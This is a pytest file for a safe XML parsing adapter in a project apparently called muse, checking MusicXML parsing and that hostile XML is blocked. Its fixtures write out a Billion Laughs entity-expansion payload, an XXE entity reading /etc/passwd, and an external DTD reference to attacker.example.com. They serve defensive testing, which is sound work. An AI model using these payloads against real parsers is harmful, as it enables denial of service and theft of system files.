cgcardona / muse public
test_core_xml_safe.py python
181 lines 6.3 KB
368bcde6 Add security test coverage and reference documentation Gabriel Cardona <gabriel@tellurstori.com> 9h ago
1 """Tests for muse.core.xml_safe — defusedxml typed adapter.
2
3 These tests verify that:
4 1. SafeET.parse() correctly parses well-formed XML / MusicXML files.
5 2. SafeET.parse() blocks XML entity expansion attacks (Billion Laughs).
6 3. SafeET.parse() blocks external entity injection (XXE).
7 4. The returned ElementTree is a standard stdlib ElementTree instance.
8 5. The ParseError, Element, and ElementTree types are correctly re-exported.
9 """
10
11 from __future__ import annotations
12
13 import pathlib
14 import xml.etree.ElementTree as StdET
15
16 import pytest
17
18 from muse.core.xml_safe import SafeET
19
20
21 # ---------------------------------------------------------------------------
22 # Helpers — test XML file factories
23 # ---------------------------------------------------------------------------
24
25
def _write(path: pathlib.Path, content: str) -> pathlib.Path:
    """Store *content* at *path* as UTF-8 text and hand the same path back.

    Returning the path lets the fixture factories below build and return a
    file in a single expression.
    """
    destination = path
    destination.write_text(content, encoding="utf-8")
    return destination
29
30
def _minimal_musicxml(tmp_path: pathlib.Path) -> pathlib.Path:
    """Create ``score.xml`` under *tmp_path* holding a one-note MusicXML score.

    The document is a ``score-partwise`` root with a single part, a single
    measure and a single note; it declares no DOCTYPE and no entities.
    Returns whatever ``_write`` returns for the new file.
    """
    target = tmp_path / "score.xml"
    document = """\
<?xml version="1.0" encoding="UTF-8"?>
<score-partwise version="3.1">
<part id="P1">
<measure number="1">
<note><pitch><step>C</step><octave>4</octave></pitch><duration>4</duration></note>
</measure>
</part>
</score-partwise>
"""
    return _write(target, document)
43
44
def _billion_laughs_xml(tmp_path: pathlib.Path) -> pathlib.Path:
    """Create ``billion_laughs.xml``: a nested entity-expansion (DoS) payload.

    Four internal entities are declared, each of ``lol2``..``lol4`` expanding
    to ten copies of the previous one, and the root element references the
    outermost entity.
    """
    target = tmp_path / "billion_laughs.xml"
    payload = """\
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root>&lol4;</root>
"""
    return _write(target, payload)
58
59
def _xxe_file_xml(tmp_path: pathlib.Path) -> pathlib.Path:
    """Create ``xxe.xml``: a document whose entity points at ``/etc/passwd``.

    The DOCTYPE declares a ``SYSTEM`` entity with a ``file://`` URL and the
    root element references it, which is the classic XXE file-read shape.
    """
    target = tmp_path / "xxe.xml"
    payload = """\
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
"""
    return _write(target, payload)
71
72
def _external_dtd_xml(tmp_path: pathlib.Path) -> pathlib.Path:
    """Create ``ext_dtd.xml``: a document whose DOCTYPE names a remote DTD.

    The ``SYSTEM`` identifier is an ``http://`` URL on an attacker-style
    host; a safe parser must never retrieve it.
    """
    target = tmp_path / "ext_dtd.xml"
    payload = """\
<?xml version="1.0"?>
<!DOCTYPE root SYSTEM "http://attacker.example.com/evil.dtd">
<root>data</root>
"""
    return _write(target, payload)
81
82
83 # ---------------------------------------------------------------------------
84 # Happy path
85 # ---------------------------------------------------------------------------
86
87
class TestSafeETParse:
    """Happy-path checks for ``SafeET.parse`` on a minimal MusicXML file."""

    def test_parses_minimal_musicxml(self, tmp_path: pathlib.Path) -> None:
        """Parsing the minimal score produces a non-``None`` result."""
        score_file = _minimal_musicxml(tmp_path)
        parsed = SafeET.parse(score_file)
        assert parsed is not None

    def test_returns_element_tree_instance(self, tmp_path: pathlib.Path) -> None:
        """The parse result is an instance of the stdlib ``ElementTree``."""
        score_file = _minimal_musicxml(tmp_path)
        parsed = SafeET.parse(score_file)
        assert isinstance(parsed, StdET.ElementTree)

    def test_getroot_returns_element(self, tmp_path: pathlib.Path) -> None:
        """``getroot()`` yields the ``score-partwise`` element."""
        score_file = _minimal_musicxml(tmp_path)
        document_root = SafeET.parse(score_file).getroot()
        assert document_root is not None
        assert document_root.tag == "score-partwise"

    def test_find_works_on_result(self, tmp_path: pathlib.Path) -> None:
        """Path queries on the parsed root locate the nested ``note``."""
        score_file = _minimal_musicxml(tmp_path)
        document_root = SafeET.parse(score_file).getroot()
        assert document_root is not None
        located = document_root.find(".//note")
        assert located is not None

    def test_accepts_str_path(self, tmp_path: pathlib.Path) -> None:
        """A plain ``str`` path is accepted as the source argument."""
        score_file = _minimal_musicxml(tmp_path)
        as_text = str(score_file)
        parsed = SafeET.parse(as_text)
        assert parsed.getroot() is not None

    def test_accepts_pathlib_path(self, tmp_path: pathlib.Path) -> None:
        """A ``pathlib.Path`` is accepted as the source argument."""
        score_file = _minimal_musicxml(tmp_path)
        parsed = SafeET.parse(score_file)
        assert parsed.getroot() is not None

    def test_nonexistent_file_raises(self, tmp_path: pathlib.Path) -> None:
        """A missing file surfaces as ``FileNotFoundError`` or ``ParseError``."""
        missing = tmp_path / "nonexistent.xml"
        acceptable = (FileNotFoundError, StdET.ParseError)
        with pytest.raises(acceptable):
            SafeET.parse(missing)
127
128
129 # ---------------------------------------------------------------------------
130 # Security — attack XML must be blocked
131 # ---------------------------------------------------------------------------
132
133
class TestSafeETSecurity:
    """Hostile XML must be rejected, and must never cause network access."""

    def test_billion_laughs_is_blocked(self, tmp_path: pathlib.Path) -> None:
        """Entity expansion (Billion Laughs DoS) must be rejected by defusedxml."""
        path = _billion_laughs_xml(tmp_path)
        # NOTE(review): the concrete exception type raised by SafeET is not
        # visible from this file, so the broad match is kept. Narrow it to the
        # adapter's documented exception once confirmed.
        with pytest.raises(Exception):
            SafeET.parse(path)

    def test_xxe_is_blocked(self, tmp_path: pathlib.Path) -> None:
        """External entity reference (XXE credential theft) must be rejected."""
        path = _xxe_file_xml(tmp_path)
        # NOTE(review): same caveat as above — broad match kept deliberately
        # until the adapter's exception type is confirmed.
        with pytest.raises(Exception):
            SafeET.parse(path)

    def test_external_dtd_reference_does_not_fetch(
        self, tmp_path: pathlib.Path, monkeypatch: "pytest.MonkeyPatch"
    ) -> None:
        """An external DTD reference in the DOCTYPE must not trigger a network
        request.

        The parser may either raise or parse successfully without applying
        the DTD; both are safe outcomes. What is never acceptable is an
        attempt to reach the remote URL. Rather than trusting the test
        environment to be offline, the socket entry points used for outbound
        connections and name resolution are replaced for the duration of the
        test; any call is recorded and fails the test.
        """
        import socket  # local import: only this test needs it

        attempts: list[str] = []

        def _forbid(label: str):
            """Build a stand-in that records the call and refuses it."""

            def _blocked(*args: object, **kwargs: object) -> None:
                attempts.append(label)
                raise OSError(f"network access attempted via {label}")

            return _blocked

        # connect / connect_ex cover outbound connections; getaddrinfo covers
        # DNS lookups (and socket.create_connection, which resolves through it).
        guarded = (
            (socket.socket, "connect"),
            (socket.socket, "connect_ex"),
            (socket, "getaddrinfo"),
        )
        for owner, attribute in guarded:
            monkeypatch.setattr(owner, attribute, _forbid(attribute))

        path = _external_dtd_xml(tmp_path)
        try:
            SafeET.parse(path)
        except Exception:
            # Blocking the DTD by raising is the strictest safe outcome. The
            # recorded attempts below still catch a fetch whose OSError was
            # swallowed here.
            pass

        assert not attempts, f"parser attempted network access: {attempts}"
162
163
164 # ---------------------------------------------------------------------------
165 # Type re-exports
166 # ---------------------------------------------------------------------------
167
168
class TestSafeETReexports:
    """``SafeET`` must expose the stdlib ElementTree names by identity."""

    def test_parse_error_is_xml_parse_error(self) -> None:
        """SafeET.ParseError must be the stdlib ParseError for generic catching."""
        exported = SafeET.ParseError
        assert exported is StdET.ParseError

    def test_element_is_xml_element(self) -> None:
        """``SafeET.Element`` is the very same object as the stdlib ``Element``."""
        exported = SafeET.Element
        assert exported is StdET.Element

    def test_element_tree_is_xml_element_tree(self) -> None:
        """``SafeET.ElementTree`` is the very same object as the stdlib class."""
        exported = SafeET.ElementTree
        assert exported is StdET.ElementTree

    def test_parse_method_exists(self) -> None:
        """``SafeET.parse`` is present and callable."""
        parse_attr = SafeET.parse
        assert callable(parse_attr)